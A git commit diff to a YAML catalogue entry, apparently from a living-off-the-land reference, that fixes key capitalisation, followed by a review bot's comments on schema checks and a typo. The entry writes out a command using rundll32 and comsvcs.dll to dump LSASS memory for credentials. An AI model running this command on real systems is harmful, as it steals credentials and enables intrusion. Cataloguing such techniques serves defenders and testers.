Adjusted case sensitive type in yml file for Comsvcs

Oddvar Moe 2019-09-16 09:44:14 +02:00
parent 11c6c7c48d
commit 4ebf1ac4f7


@ -6,11 +6,11 @@ Created: '2019-08-30'
Commands: Commands:
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
UseCase: Dump Lsass.exe process memory to retrieve credentials. Usecase: Dump Lsass.exe process memory to retrieve credentials.
Category: Dump Category: Dump
Privileges: SYSTEM Privileges: SYSTEM
MitreID: T1003 MitreID: T1003
MItreLink: https://attack.mitre.org/wiki/Technique/T1003 MitreLink: https://attack.mitre.org/wiki/Technique/T1003
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: c:\windows\system32\comsvcs.dll - Path: c:\windows\system32\comsvcs.dll
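
Review bot: The two keys renamed here, `UseCase` to `Usecase` and `MItreLink` to `MitreLink`, were wrong only in letter case, so a case-sensitive consumer of this file would have dropped both fields without an error until this fix. A schema check that rejects unknown keys in these yml entries would catch this at commit time. The new `Usecase` spelling also breaks from the inner capitals used by `MitreID`, `MitreLink` and `OperatingSystem` in the same entry, so the template should state which spelling is canonical. Separately, the unchanged `Description` line reads "which in turns calls" and should be "which in turn calls".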